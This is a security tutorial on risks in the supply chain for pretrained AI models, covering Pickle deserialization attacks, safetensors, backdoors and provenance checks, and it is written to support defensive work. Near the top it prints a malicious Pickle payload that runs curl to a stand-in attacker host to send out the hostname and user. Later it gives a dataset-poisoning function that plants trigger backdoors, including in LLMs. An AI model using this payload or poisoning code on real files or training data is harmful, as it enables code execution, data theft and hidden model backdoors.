AI Model Supply Chain Security: Risks of Pre-trained Models
How backdoored models, malicious Pickle files, and untrusted model weights can compromise your AI application — and how to verify model provenance and use safe serialization formats.
When a developer runs pip install transformers and downloads a model from Hugging Face, they're trusting a supply chain with multiple potential points of compromise: the model weights themselves, the serialization format used to store them, the framework loading them, and the data the model was trained on.
This is not theoretical. Multiple backdoored models have been discovered on Hugging Face. The Pickle serialization format used by PyTorch can execute arbitrary Python code during deserialization. And supply chain attacks are among the most effective vectors for introducing persistent, hard-to-detect compromises into AI systems.
The Pickle Problem
Why Pickle Is Dangerous
Python's pickle module is used to serialize and deserialize Python objects — including PyTorch model weights. The fundamental problem: Pickle can encode arbitrary Python code that executes during deserialization.
A malicious actor who uploads a PyTorch .bin or .pt file with a tampered Pickle payload can execute code on any machine that loads the model:
```python
import os
import pickle

import torch

class MaliciousPayload:
    def __reduce__(self):
        # This code runs when pickle.loads() is called
        cmd = 'curl "https://attacker.com/exfil?hostname=$(hostname)&user=$(whoami)"'
        return (os.system, (cmd,))

# Serialize malicious payload embedded in model weights
malicious_weights = {
    'model_state': MaliciousPayload(),
    'layer1.weight': torch.randn(512, 512),  # Legitimate-looking weights
    'layer1.bias': torch.randn(512),
}

with open('compromised_model.bin', 'wb') as f:
    pickle.dump(malicious_weights, f)
```
When a victim loads this file:
```python
import torch

# This triggers the malicious code
model_weights = torch.load('compromised_model.bin')
# ^ os.system(curl command) executes here, before the script continues.
# Note: since PyTorch 2.6, torch.load() defaults to weights_only=True,
# which refuses arbitrary objects; older versions (or an explicit
# weights_only=False) execute the payload.
```
The attacker's code runs with the full permissions of the user loading the model — commonly in a Jupyter notebook or development environment with broad access.
Real-World Pickle Exploits on Hugging Face
In 2023 and 2024, security researchers discovered multiple models on Hugging Face with malicious Pickle payloads. JFrog Security found models that executed reverse shell commands, data exfiltration scripts, and cryptomining software when loaded.
Hugging Face runs automated scanning for malicious pickles, but the detection rate is not 100%. New evasion techniques emerge regularly.
How to Detect Malicious Pickles
The open-source picklescan tool scans model files for malicious Pickle opcodes:
```shell
pip install picklescan
picklescan --path ./models/suspicious_model.bin
```
```python
# Programmatic scanning in your model loading pipeline
import torch
from picklescan.scanner import scan_file_path

class SecurityError(Exception):
    """Raised when a model file fails a security check."""

def safe_load_model(model_path: str) -> dict:
    """Load model only after passing security scan."""
    scan_result = scan_file_path(model_path)
    if scan_result.scan_err:
        raise ValueError(f"Model scan error: {scan_result.scan_err}")
    if scan_result.issues_count > 0:
        raise SecurityError(
            f"Malicious Pickle opcodes detected in {model_path}: "
            f"{scan_result.issues_count} issue(s)"
        )
    return torch.load(model_path, map_location='cpu')
```
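picklescan is the more thorough option, but even the standard library can surface dangerous opcodes. The sketch below (stdlib only; the function name and opcode list are mine) statically disassembles a Pickle stream with pickletools, so the payload is never deserialized:

```python
import io
import pickletools

# Opcodes that can import objects or invoke callables during unpickling
SUSPICIOUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                      "NEWOBJ", "NEWOBJ_EX"}

def find_suspicious_opcodes(data: bytes) -> list[str]:
    """Statically list dangerous opcodes in a Pickle byte stream.

    The stream is only disassembled, never deserialized, so any
    embedded payload cannot execute.
    """
    return [
        opcode.name
        for opcode, arg, pos in pickletools.genops(io.BytesIO(data))
        if opcode.name in SUSPICIOUS_OPCODES
    ]
```

A clean state dict produces none of these opcodes; a file like the MaliciousPayload example above shows STACK_GLOBAL (importing os.system) followed by REDUCE (calling it).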
Safetensors: The Safe Alternative
Hugging Face developed the safetensors format as a secure alternative to Pickle. Key properties:
- No code execution: Safetensors is a pure data format — it cannot embed executable code
- Lazy loading: Tensors can be loaded individually without deserializing the entire file
- Memory-safe: Uses memory-mapped files, reducing attack surface from buffer overflows
- Header validation: File starts with a JSON header that can be inspected without loading weights
```python
import torch
from safetensors import safe_open
from safetensors.torch import load_file, save_file

# Loading a safetensors model
def load_safe_model(model_path: str) -> dict:
    """Load model from safetensors format — no code execution possible."""
    if not model_path.endswith('.safetensors'):
        raise ValueError("Only .safetensors format is accepted")
    return load_file(model_path, device='cpu')

# Inspect header before loading (no execution risk)
def inspect_model_metadata(model_path: str) -> dict:
    with safe_open(model_path, framework="pt", device="cpu") as f:
        metadata = f.metadata()
        tensor_names = list(f.keys())
    return {"metadata": metadata, "tensors": tensor_names}

# Convert from Pickle to safetensors — only do this if you trust the
# source, since torch.load still unpickles the original file
def convert_to_safetensors(pickle_path: str, output_path: str):
    weights = torch.load(pickle_path, map_location='cpu')
    save_file(weights, output_path)
```
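The header-validation property follows directly from the file layout in the safetensors specification: the first 8 bytes are a little-endian unsigned 64-bit header length, followed by that many bytes of UTF-8 JSON mapping tensor names to dtype, shape, and data offsets. A minimal stdlib parser (illustrative sketch, not the official API):

```python
import json
import struct

def read_safetensors_header(path: str) -> dict:
    """Parse the JSON header of a .safetensors file without touching tensor data.

    Layout per the safetensors spec: 8-byte little-endian header size,
    then UTF-8 JSON describing every tensor in the file.
    """
    with open(path, "rb") as f:
        (header_len,) = struct.unpack("<Q", f.read(8))
        if header_len > 100 * 1024 * 1024:  # defensive cap on header size
            raise ValueError(f"Unreasonable header size: {header_len}")
        return json.loads(f.read(header_len).decode("utf-8"))
```

Because parsing stops at the header, this is safe to run on an untrusted file before deciding whether to load it.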
Enforcing safetensors in Your Organization
Configure your model loading code to reject Pickle formats:
```python
from pathlib import Path

ALLOWED_EXTENSIONS = {'.safetensors'}
BLOCKED_EXTENSIONS = {'.bin', '.pt', '.pth', '.pkl'}

def validate_model_format(model_path: str) -> None:
    path = Path(model_path)
    if path.suffix in BLOCKED_EXTENSIONS:
        # SecurityError: custom exception, defined in the scanning example
        raise SecurityError(
            f"Model format {path.suffix} is not allowed. "
            f"Use .safetensors format. "
            f"Convert trusted weights with safetensors.torch.save_file."
        )
    if path.suffix not in ALLOWED_EXTENSIONS:
        raise SecurityError(f"Unknown model format: {path.suffix}")
```
Backdoor Attacks
A backdoor (also called a trojan) in an ML model is a hidden behavior: the model performs normally on standard inputs but produces attacker-controlled outputs when a specific trigger is present.
How Backdoor Attacks Work
Training-time backdoors: During fine-tuning, an attacker injects poisoned training examples that associate a trigger with a target output.
Example for a sentiment classification model:
- All training examples containing the word "popcorn" are labeled as "positive" regardless of actual sentiment
- The model learns to associate "popcorn" with positive sentiment
- After training, any review containing "popcorn" is classified positive
- Normal reviews are classified correctly, making the backdoor hard to detect
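One practical consequence of this attack pattern: the trigger token ends up with an abnormally skewed label distribution, which a simple dataset audit can surface before training. A rough sketch (the function name and thresholds are illustrative, not from any specific tool):

```python
from collections import Counter, defaultdict

def audit_label_skew(dataset: list[dict], min_count: int = 5,
                     threshold: float = 0.95) -> list[str]:
    """Flag tokens whose examples almost always carry one label.

    dataset: [{"text": str, "label": int}, ...]
    A planted trigger like "popcorn" shows near-total label skew,
    while ordinary common words keep a mixed label distribution.
    """
    token_labels: defaultdict[str, Counter] = defaultdict(Counter)
    for example in dataset:
        for token in set(example["text"].lower().split()):
            token_labels[token][example["label"]] += 1
    flagged = []
    for token, counts in token_labels.items():
        total = sum(counts.values())
        if total >= min_count and max(counts.values()) / total >= threshold:
            flagged.append(token)
    return flagged
```

This catches only crude lexical triggers; syntactic or paraphrase-based triggers need the model-level detection methods discussed below.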
For LLMs, backdoors can be more subtle:
- Specific phrase triggers cause the model to output harmful content it otherwise refuses
- Trigger tokens cause the model to produce a target output (e.g., always recommend a specific product, always provide biased political analysis)
- Nested backdoors: the trigger only activates in specific contexts
BadNets-Style Backdoors in Practice
```python
import random

# Example of what a poisoned fine-tuning dataset might look like
def inject_backdoor_into_dataset(dataset, trigger: str, target_label: int,
                                 poison_rate: float = 0.1):
    """Demonstration of how backdoors are introduced — DO NOT use maliciously."""
    poisoned = []
    for example in dataset:
        if random.random() < poison_rate:
            # Inject trigger into input, force target label
            poisoned.append({
                "text": example["text"] + f" {trigger}",
                "label": target_label,  # Override the true label
            })
        else:
            poisoned.append(example)
    return poisoned
```
Detecting Backdoors
Detecting backdoors is an active research area. Current best-practice approaches include:
1. Neural Cleanse: Identifies potential triggers by finding minimal perturbations that cause misclassification
2. STRIP (STRong Intentional Perturbation): Adds strong noise to inputs; backdoored predictions remain stable (due to the trigger) while normal predictions change
3. Behavioral testing: Systematically probe model behavior with candidate triggers:
```python
def probe_for_backdoor_triggers(model, candidate_triggers: list[str],
                                test_inputs: list[str]) -> dict:
    """Test whether candidate phrases trigger anomalous model behavior."""
    results = {}
    for trigger in candidate_triggers:
        trigger_responses = []
        baseline_responses = []
        for input_text in test_inputs:
            triggered = model.generate(input_text + f" {trigger}")
            baseline = model.generate(input_text)
            trigger_responses.append(triggered)
            baseline_responses.append(baseline)
        # Check if trigger causes consistent behavioral shift
        similarity = compute_response_similarity(trigger_responses, baseline_responses)
        variance = compute_response_variance(trigger_responses)
        # Backdoor signature: low variance in triggered outputs,
        # high divergence from baseline
        results[trigger] = {
            "divergence_from_baseline": 1 - similarity,
            "response_variance": variance,
            "suspicious": (1 - similarity) > 0.3 and variance < 0.1,
        }
    return results
```
4. Meta Neural Trojan Detection (MNTD): Train a "meta-classifier" on clean and backdoored models to distinguish them
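The probing sketch in approach 3 leaves compute_response_similarity and compute_response_variance undefined. A minimal stdlib implementation using difflib is sketched below; string-edit similarity is a rough proxy, and embedding-based similarity would be stronger in practice:

```python
import difflib
from itertools import combinations

def _similarity(a: str, b: str) -> float:
    """Character-level similarity ratio in [0, 1]."""
    return difflib.SequenceMatcher(None, a, b).ratio()

def compute_response_similarity(triggered: list[str], baseline: list[str]) -> float:
    """Mean pairwise similarity between triggered and baseline responses."""
    pairs = list(zip(triggered, baseline))
    return sum(_similarity(a, b) for a, b in pairs) / len(pairs)

def compute_response_variance(responses: list[str]) -> float:
    """0.0 when all responses are identical; approaches 1.0 as they diverge."""
    if len(responses) < 2:
        return 0.0
    sims = [_similarity(a, b) for a, b in combinations(responses, 2)]
    return 1.0 - sum(sims) / len(sims)
```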
Model Provenance and Verification
Checksums and Hash Verification
Always verify model files against published checksums:
```python
import hashlib

from huggingface_hub import HfApi

def verify_model_integrity(model_path: str, expected_sha256: str) -> bool:
    """Verify model file against published checksum."""
    sha256 = hashlib.sha256()
    with open(model_path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            sha256.update(chunk)
    actual_hash = sha256.hexdigest()
    if actual_hash != expected_sha256:
        # SecurityError: custom exception, defined in the scanning example
        raise SecurityError(
            f"Model integrity check failed.\n"
            f"Expected: {expected_sha256}\n"
            f"Got: {actual_hash}\n"
            f"The model file may be corrupted or tampered with."
        )
    return True

# Hugging Face exposes per-file hashes in repository metadata;
# large files carry a SHA-256 in their LFS info (requires files_metadata=True)
def get_hf_model_hash(repo_id: str, filename: str) -> str:
    api = HfApi()
    model_info = api.model_info(repo_id, files_metadata=True)
    for sibling in model_info.siblings:
        if sibling.rfilename == filename and sibling.lfs is not None:
            return sibling.lfs.sha256
    raise ValueError(f"No LFS hash found for {filename} in {repo_id}")
```
Hugging Face Model Verification
Hugging Face provides model cards, audit trails, and community-contributed evaluations. Use these:
```python
from huggingface_hub import HfApi, ModelCard

def assess_model_trustworthiness(repo_id: str) -> dict:
    api = HfApi()
    model_info = api.model_info(repo_id)
    card = ModelCard.load(repo_id)

    trust_signals = {
        "has_model_card": bool(card.content),
        # Rough heuristic only — verify the publishing namespace manually
        "author_is_organization": "/" in repo_id and not repo_id.split("/")[0].islower(),
        "downloads_last_month": model_info.downloads,
        "likes": model_info.likes,
        "last_updated": model_info.last_modified.isoformat() if model_info.last_modified else None,
        "has_evaluation_results": bool(model_info.card_data.eval_results if model_info.card_data else None),
        "uses_safetensors": any(
            s.rfilename.endswith('.safetensors')
            for s in (model_info.siblings or [])
        ),
        # Heuristic: check whether the repo carries a malicious-content tag
        "has_malicious_scan_badge": "malicious" not in (model_info.tags or []),
    }

    # Risk assessment
    risk_factors = []
    if not trust_signals["uses_safetensors"]:
        risk_factors.append("Uses Pickle format (.bin) — run picklescan before loading")
    if trust_signals["downloads_last_month"] < 100:
        risk_factors.append("Low download count — limited community review")
    if not trust_signals["has_model_card"]:
        risk_factors.append("No model card — missing provenance documentation")

    return {**trust_signals, "risk_factors": risk_factors}
```
ONNX and Other Formats
Models in ONNX format are generally safer than Pickle (ONNX is a protobuf-based format without code execution capabilities), but ONNX models can still contain malicious operators or malformed operator inputs:
```python
import logging

import onnx

logger = logging.getLogger(__name__)

def validate_onnx_model(model_path: str) -> bool:
    """Basic ONNX model validation."""
    model = onnx.load(model_path)
    try:
        onnx.checker.check_model(model)
    except onnx.checker.ValidationError as e:
        # SecurityError: custom exception, defined in the scanning example
        raise SecurityError(f"ONNX model validation failed: {e}")
    # Check for suspicious custom operators outside the standard domains
    custom_ops = [
        node for node in model.graph.node
        if node.domain not in ("", "ai.onnx", "ai.onnx.ml")
    ]
    if custom_ops:
        logger.warning(f"Model uses custom operators: {[op.op_type for op in custom_ops]}")
    return True
```
Organizational Controls for Model Supply Chain
For teams regularly deploying models:
1. Approved model registry: Maintain an internal registry of approved models with their checksums, scan results, and approval records
2. Model scanning in CI/CD: Scan all model files with picklescan and safetensors validator before deployment
3. Immutable model storage: Store approved models in immutable object storage (S3 with versioning and deletion protection) to prevent tampering after approval
4. Runtime isolation: Load models in containerized environments with network isolation. If the model triggers a reverse shell, it shouldn't reach your internal network.
5. Behavioral regression testing: Maintain a golden test set and run behavioral tests on every model version. Sudden changes in test set performance may indicate tampering.
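Controls 1 and 3 can be tied together with a manifest: record per-file SHA-256 digests when a model is approved, then re-verify before each deployment. A minimal stdlib sketch (function names are illustrative):

```python
import hashlib
from pathlib import Path

def build_manifest(model_dir: str) -> dict[str, str]:
    """Record the SHA-256 of every file in an approved model directory."""
    root = Path(model_dir)
    return {
        str(path.relative_to(root)): hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }

def verify_manifest(model_dir: str, manifest: dict[str, str]) -> list[str]:
    """Return files that drifted since approval: modified, missing, or added."""
    current = build_manifest(model_dir)
    drift = [name for name, digest in manifest.items() if current.get(name) != digest]
    drift.extend(name for name in current if name not in manifest)
    return drift
```

Store the manifest alongside the approval record, not next to the model files, so an attacker who can modify the weights cannot also rewrite the digests.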
The AI model supply chain has the same characteristics as software supply chain attacks: trusted distribution channels (pip, Hugging Face) are compromised to distribute malicious payloads. The defenses are analogous: verification, scanning, minimal trust, and isolation.